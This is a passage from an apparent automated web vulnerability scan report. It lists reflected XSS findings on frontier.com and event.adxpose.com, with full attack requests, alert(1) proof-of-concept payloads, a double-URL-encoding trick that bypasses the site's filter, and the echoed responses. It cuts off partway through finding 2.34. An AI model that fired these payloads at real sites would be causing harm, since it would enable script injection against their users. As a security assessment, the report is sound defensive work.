2.23. http://event.adxpose.com/event.flow [uid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://event.adxpose.com |
| Path: |
/event.flow |
Issue detail
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 18ccf<script>alert(1)</script>aa7f8549978 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D8383746361359954%3F&uid=TVYMYp4lQTRs9JsS_4098672818ccf<script>alert(1)</script>aa7f8549978&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1315331134985-48379358672536910&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77EE7E015EE500AABD3FD55823F0F1DB; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Tue, 06 Sep 2011 12:46:01 GMT
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_4098672818ccf<script>alert(1)</script>aa7f8549978"); |
2.24. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/AgentOrdering/CustomAppTabInfo/tabs.css |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d0c%2527%253balert%25281%2529%252f%252f8df9650bb55 was submitted in the REST URL parameter 1. This input was echoed as 72d0c';alert(1)//8df9650bb55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering72d0c%2527%253balert%25281%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering72d0c';alert(1)//8df9650bb55/CustomAppTabInfo/tabs.css');//]]>
...[SNIP]...
|
2.25. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/AgentOrdering/CustomAppTabInfo/tabs.css |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 246a3%2527%253balert%25281%2529%252f%252fe03a978b338 was submitted in the REST URL parameter 2. This input was echoed as 246a3';alert(1)//e03a978b338 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering/CustomAppTabInfo246a3%2527%253balert%25281%2529%252f%252fe03a978b338/tabs.css HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/CustomAppTabInfo246a3';alert(1)//e03a978b338/tabs.css');//]]>
...[SNIP]...
|
2.26. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/AgentOrdering/CustomAppTabInfo/tabs.css |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ac67%2527%253balert%25281%2529%252f%252f9c77ef6d725 was submitted in the REST URL parameter 3. This input was echoed as 1ac67';alert(1)//9c77ef6d725 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering/CustomAppTabInfo/tabs.css1ac67%2527%253balert%25281%2529%252f%252f9c77ef6d725 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/CustomAppTabInfo/tabs.css1ac67';alert(1)//9c77ef6d725');//]]>
...[SNIP]...
|
2.27. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/AgentOrdering/Login/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa607%2527%253balert%25281%2529%252f%252f787cb7d4dcb was submitted in the REST URL parameter 1. This input was echoed as aa607';alert(1)//787cb7d4dcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrderingaa607%2527%253balert%25281%2529%252f%252f787cb7d4dcb/Login/ HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43627
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrderingaa607';alert(1)//787cb7d4dcb/Login/');//]]>
...[SNIP]...
|
2.28. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/AgentOrdering/Login/ |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44e10%2527%253balert%25281%2529%252f%252f43ea9213a24 was submitted in the REST URL parameter 2. This input was echoed as 44e10';alert(1)//43ea9213a24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrdering/Login44e10%2527%253balert%25281%2529%252f%252f43ea9213a24/ HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43627
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/Login44e10';alert(1)//43ea9213a24/');//]]>
...[SNIP]...
|
2.29. http://frontier.com/BillPay/Login.aspx [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://frontier.com |
| Path: |
/BillPay/Login.aspx |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8990'%3b3ad87ec9c52 was submitted in the REST URL parameter 1. This input was echoed as c8990';3ad87ec9c52 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BillPayc8990'%3b3ad87ec9c52/Login.aspx HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response (redirected)
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43311
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/BillPayc8990';3ad87ec9c52/Login.aspx');//]]>
...[SNIP]...
|
2.30. http://frontier.com/BillPay/Login.aspx [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/BillPay/Login.aspx |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f062%2527%253balert%25281%2529%252f%252fa328f8cd333 was submitted in the REST URL parameter 2. This input was echoed as 3f062';alert(1)//a328f8cd333 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /BillPay/Login.aspx3f062%2527%253balert%25281%2529%252f%252fa328f8cd333 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/BillPay/Login.aspx3f062';alert(1)//a328f8cd333');//]]>
...[SNIP]...
|
2.31. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/Controls/SharedWebMethods.aspx/GetCurrentLocale |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2a52%2527%253balert%25281%2529%252f%252f6141da654bb was submitted in the REST URL parameter 2. This input was echoed as b2a52';alert(1)//6141da654bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
POST /Controls/SharedWebMethods.aspxb2a52%2527%253balert%25281%2529%252f%252f6141da654bb/GetCurrentLocale HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
Content-Length: 12
Origin: http://frontier.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
{'href': ''} |
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43807
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Controls/SharedWebMethods.aspxb2a52';alert(1)//6141da654bb/GetCurrentLocale');//]]>
...[SNIP]...
|
2.32. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://frontier.com |
| Path: |
/Controls/VirtualCode.ashx |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56e88'%3b3d6207f3d2f was submitted in the REST URL parameter 1. This input was echoed as 56e88';3d6207f3d2f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Controls56e88'%3b3d6207f3d2f/VirtualCode.ashx?pageid=98&origPath=%2fftr.css%2f HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av
|
Response (redirected)
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/Controls56e88';3d6207f3d2f/VirtualCode.ashx');//]]>
...[SNIP]...
|
2.33. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/Controls/VirtualCode.ashx |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73438%2527%253balert%25281%2529%252f%252f0fdd979cf43 was submitted in the REST URL parameter 2. This input was echoed as 73438';alert(1)//0fdd979cf43 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Controls/VirtualCode.ashx73438%2527%253balert%25281%2529%252f%252f0fdd979cf43?pageid=98&origPath=%2fftr.css%2f HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Controls/VirtualCode.ashx73438';alert(1)//0fdd979cf43?pageid=98&origPath=/ftr.css/');//]]>
...[SNIP]...
|
2.34. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://frontier.com |
| Path: |
/Images/2011promo/bg-grey.jpg |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7327a%2527%253balert%25281%2529%252f%252f2dd01931fc3 was submitted in the REST URL parameter 1. This input was echoed as 7327a';alert(1)//2dd01931fc3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Images7327a%2527%253balert%25281%2529%252f%252f2dd01931fc3/2011promo/bg-grey.jpg HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43683
